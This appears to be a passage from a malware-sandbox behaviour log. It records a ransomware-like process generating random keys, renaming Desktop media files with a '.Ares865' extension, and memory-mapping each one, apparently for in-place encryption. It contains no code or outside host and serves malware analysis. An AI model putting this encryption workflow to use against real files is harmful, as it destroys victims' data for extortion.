CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.077] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d90, lpName=0x0) returned 0x124 [0107.077] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d90) returned 0x190000 [0107.078] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.079] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.079] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.080] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.Ares865") returned 57 [0107.080] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0107.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.081] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=282) returned 1 [0107.082] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.082] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.082] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.083] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x124 [0107.083] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0107.084] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.086] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\efmDajHQKclt.mp4.Ares865") returned 62 [0107.086] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\efmDajHQKclt.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\efmdajhqkclt.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\efmDajHQKclt.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\efmdajhqkclt.mp4.ares865"), dwFlags=0x1) returned 1 [0107.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\efmDajHQKclt.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\efmdajhqkclt.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=99253) returned 1 [0107.087] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.088] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.088] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x186c0, lpName=0x0) returned 0x124 [0107.088] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x186c0) returned 0x190000 [0107.091] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5QBdGc.avi.Ares865") returned 57 [0107.095] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5QBdGc.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g5qbdgc.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5QBdGc.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g5qbdgc.avi.ares865"), dwFlags=0x1) returned 1 [0107.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5QBdGc.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g5qbdgc.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=74890) returned 1 [0107.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.099] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12790, lpName=0x0) returned 0x124 [0107.099] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12790) returned 0x190000 [0107.101] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.102] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.102] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HTQ7kmHciRa41lHH5n.m4a.Ares865") returned 68 [0107.106] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HTQ7kmHciRa41lHH5n.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\htq7kmhcira41lhh5n.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HTQ7kmHciRa41lHH5n.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\htq7kmhcira41lhh5n.m4a.ares865"), dwFlags=0x1) returned 1 [0107.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HTQ7kmHciRa41lHH5n.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\htq7kmhcira41lhh5n.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.112] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56342) returned 1 [0107.112] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.113] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.113] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.113] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf20, lpName=0x0) returned 0x124 [0107.113] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf20) returned 0x190000 [0107.114] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.115] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.115] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.117] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hZGD.m4a.Ares865") returned 54 [0107.117] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hZGD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hzgd.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hZGD.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hzgd.m4a.ares865"), dwFlags=0x1) returned 1 [0107.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hZGD.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hzgd.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2161) returned 1 [0107.120] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.120] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.120] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.121] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb80, lpName=0x0) returned 0x124 [0107.121] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb80) returned 0x190000 [0107.121] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.122] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.122] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.124] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j3k_vNOqGKBFPKbf.swf.Ares865") returned 66 [0107.124] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j3k_vNOqGKBFPKbf.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j3k_vnoqgkbfpkbf.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j3k_vNOqGKBFPKbf.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j3k_vnoqgkbfpkbf.swf.ares865"), dwFlags=0x1) returned 1 [0107.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j3k_vNOqGKBFPKbf.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j3k_vnoqgkbfpkbf.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.128] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26597) returned 1 [0107.128] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.131] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6af0, lpName=0x0) returned 0x124 [0107.131] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6af0) returned 0x190000 [0107.132] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.133] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.133] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JfjKybV1iT1_G7GQNfsH.mkv.Ares865") returned 70 [0107.134] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JfjKybV1iT1_G7GQNfsH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jfjkybv1it1_g7gqnfsh.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JfjKybV1iT1_G7GQNfsH.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jfjkybv1it1_g7gqnfsh.mkv.ares865"), dwFlags=0x1) returned 1 [0107.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JfjKybV1iT1_G7GQNfsH.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jfjkybv1it1_g7gqnfsh.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.136] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52558) returned 1 [0107.136] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.137] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd050, lpName=0x0) returned 0x124 [0107.137] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd050) returned 0x190000 [0107.139] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.139] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.139] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.142] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgrfsq-U.bmp.Ares865") returned 58 [0107.142] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgrfsq-U.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgrfsq-u.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgrfsq-U.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgrfsq-u.bmp.ares865"), dwFlags=0x1) returned 1 [0107.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mgrfsq-U.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mgrfsq-u.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66947) returned 1 [0107.145] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.146] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.146] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.146] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10890, lpName=0x0) returned 0x124 [0107.147] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10890) returned 0x190000 [0107.148] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.149] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.149] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mxU2qMa.gif.Ares865") returned 57 [0107.151] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mxU2qMa.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mxu2qma.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mxU2qMa.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mxu2qma.gif.ares865"), dwFlags=0x1) returned 1 [0107.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mxU2qMa.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mxu2qma.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53561) returned 1 [0107.157] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.160] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.160] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.162] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd440, lpName=0x0) returned 0x124 [0107.162] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd440) returned 0x190000 [0107.167] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.170] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.171] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p3bNx7jS.wav.Ares865") returned 58 [0107.177] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p3bNx7jS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p3bnx7js.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p3bNx7jS.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p3bnx7js.wav.ares865"), dwFlags=0x1) returned 1 [0107.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p3bNx7jS.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p3bnx7js.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.182] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8468) returned 1 [0107.182] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.183] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2420, lpName=0x0) returned 0x124 [0107.183] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2420) returned 0x190000 [0107.184] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.185] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.185] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P7Wc.mp3.Ares865") returned 54 [0107.188] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P7Wc.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p7wc.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P7Wc.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p7wc.mp3.ares865"), dwFlags=0x1) returned 1 [0107.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P7Wc.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p7wc.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.190] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71970) returned 1 [0107.190] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.191] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.191] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.191] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11c30, lpName=0x0) returned 0x124 [0107.191] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c30) returned 0x190000 [0107.193] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.194] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.194] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.196] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcHqC7yd_ gx.mkv.Ares865") returned 62 [0107.196] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcHqC7yd_ gx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pchqc7yd_ gx.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcHqC7yd_ gx.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pchqc7yd_ gx.mkv.ares865"), dwFlags=0x1) returned 1 [0107.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pcHqC7yd_ gx.mkv.Ares865" 